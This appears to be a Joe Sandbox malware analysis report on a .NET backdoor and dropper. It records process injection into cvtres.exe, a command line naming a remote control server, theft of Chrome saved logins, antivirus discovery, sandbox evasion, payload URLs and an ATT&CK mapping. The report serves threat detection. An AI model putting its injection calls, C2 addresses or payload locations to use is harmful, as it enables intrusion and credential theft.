                  Source: IWsK3V2Ul9.exe, RunPE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.raw.unpack, PandoraRecovery.cs.Net Code: OnResolveAssembly System.Reflection.Assembly.Load(byte[])
                  Source: IWsK3V2Ul9.exeStatic PE information: 0xF7264755 [Wed May 25 16:16:21 2101 UTC]
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeCode function: 0_2_00007FFE7E1B00BD pushad ; iretd 0_2_00007FFE7E1B00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 4_2_013B2A09 push 550135CBh; retf 4_2_013B2A0D
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory allocated: 20EFCAE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory allocated: 20EFE3F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 13B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 1837Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 8132Jump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exe TID: 3412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4476Thread sleep count: 1837 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4476Thread sleep time: -18370000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4476Thread sleep count: 8132 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4476Thread sleep time: -81320000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: cvtres.exe, 00000004.00000002.3875121788.00000000015A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: IWsK3V2Ul9.exe PID: 6948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 1852, type: MEMORYSTR
                  Source: IWsK3V2Ul9.exe, RunPE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: IWsK3V2Ul9.exe, RunPE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: IWsK3V2Ul9.exe, RunPE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                  Source: IWsK3V2Ul9.exe, RunPE.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
                  Source: IWsK3V2Ul9.exe, RunPE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
                  Source: IWsK3V2Ul9.exe, Program.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 414000Jump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 416000Jump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 11BF008Jump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 147.185.221.17 55141 YnZwwlrYvJump to behavior
                  Source: IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeQueries volume information: C:\Users\user\Desktop\IWsK3V2Ul9.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\IWsK3V2Ul9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: cvtres.exe, 00000004.00000002.3875121788.0000000001642000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3875121788.00000000015A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: IWsK3V2Ul9.exe PID: 6948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 1852, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.IWsK3V2Ul9.exe.20e800905f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: IWsK3V2Ul9.exe PID: 6948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 1852, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation
                  1
                  Create Account
                  312
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  21
                  Security Software Discovery
                  Remote Services1
                  Input Capture
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  Input Capture
                  2
                  Process Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  1
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion
                  Security Account Manager31
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares1
                  Data from Local System
                  1
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Obfuscated Files or Information
                  Cached Domain Credentials12
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Software Packing
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Timestomp
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  IWsK3V2Ul9.exe79%ReversingLabsByteCode-MSIL.Backdoor.Xhvnc
                  IWsK3V2Ul9.exe100%AviraTR/Dropper.Gen
                  IWsK3V2Ul9.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://51.254.27.112:1337/skra.jpg0%Avira URL Cloudsafe
                  147.185.221.170%Avira URL Cloudsafe
                  https://raw.githubusercontent.com/PandorahVNC/PhotoCollection/main/rescale.ps10%Avira URL Cloudsafe
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  147.185.221.17true
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://raw.githubusercontent.com/PandorahVNC/PhotoCollection/main/rescale.ps1IWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://51.254.27.112:1337/skra.jpgIWsK3V2Ul9.exe, 00000000.00000002.1422800381.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000004.00000002.3874161154.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecvtres.exe, 00000004.00000002.3875809384.00000000032C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  147.185.221.17
                  unknownUnited States
                  12087SALSGIVERUStrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1516618
                  Start date and time:2024-09-24 13:28:16 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 10s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:12
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:IWsK3V2Ul9.exe
                  renamed because original name is a hash value
                  Original Sample Name:040cef4a919bf259e750029187dcfeff8b4b8f18e6a65cb401ee941d7999dd51.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/3@0/1
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 30
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target cvtres.exe, PID 1852 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: IWsK3V2Ul9.exe
                  TimeTypeDescription
                  07:29:29API Interceptor8098346x Sleep call for process: cvtres.exe modified
                  13:29:27Task SchedulerRun new task: CreateExplorerShellUnelevatedTask path: C:\Windows\explorer.exe s>/NoUACCheck
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  147.185.221.17SecuriteInfo.com.Trojan.Siggen29.35475.19245.6407.exeGet hashmaliciousSheetRatBrowse
                    80c619d931fa4e5c89fe87aac0b6b143.exeGet hashmaliciousXWormBrowse
                      6ab092aeab924edb854b3ff21ea579df.exeGet hashmaliciousXWormBrowse
                        Hoodbyunlock.exeGet hashmaliciousXWormBrowse
                          x.exeGet hashmaliciousXWormBrowse
                            cougif6lqM.exeGet hashmaliciousDCRat, XWormBrowse
                              FUDE.bin.exeGet hashmaliciousXWormBrowse
                                system47.exeGet hashmaliciousXWormBrowse
                                  setup.exeGet hashmaliciousXWormBrowse
                                    APPoKkkk8h.exeGet hashmaliciousUnknownBrowse
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      SALSGIVERUSSecuriteInfo.com.FileRepMalware.32767.25187.exeGet hashmaliciousUnknownBrowse
                                      • 147.185.221.20
                                      SecuriteInfo.com.Trojan.Siggen29.35475.19245.6407.exeGet hashmaliciousSheetRatBrowse
                                      • 147.185.221.17
                                      jQ2ryeS5ZP.exeGet hashmaliciousPureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog StealerBrowse
                                      • 147.185.221.22
                                      AutoWizard.exeGet hashmaliciousQuasarBrowse
                                      • 147.185.221.22
                                      dsadsadsadsadsadsaw.exeGet hashmaliciousQuasarBrowse
                                      • 147.185.221.22
                                      killerdude.exeGet hashmaliciousQuasarBrowse
                                      • 147.185.221.22
                                      SecuriteInfo.com.Trojan.TR.Dropper.Gen.22332.4876.exeGet hashmaliciousUnknownBrowse
                                      • 147.185.221.19
                                      XyjvIO6D4m.exeGet hashmaliciousXWormBrowse
                                      • 147.185.221.22
                                      vtCneOrnat.exeGet hashmaliciousXWormBrowse
                                      • 147.185.221.22
                                      jbG3cpmy.exeGet hashmaliciousXWormBrowse
                                      • 147.185.221.22
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\IWsK3V2Ul9.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):1088
                                      Entropy (8bit):5.389928136181357
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/E
                                      MD5:6B2359BF987F4BDAF6CB014F63217859
                                      SHA1:3894B16E010FEFF2E71BEE0274746FC34C57C1DF
                                      SHA-256:ED763CED7BDAE1851B6A82D1D3685E9CC94937ADADD492DD2C1AC0AB639227FD
                                      SHA-512:C440BE0810F8CF29ADB6E816DA07A673C1E60E926926B2E863AFE7529C2D5EDB6118335C535CD0B4F0F7D7D6E5FE9801328A37FA4012F7D4B737F6F099A1489D
                                      Malicious:true
                                      Reputation:moderate, very likely benign file
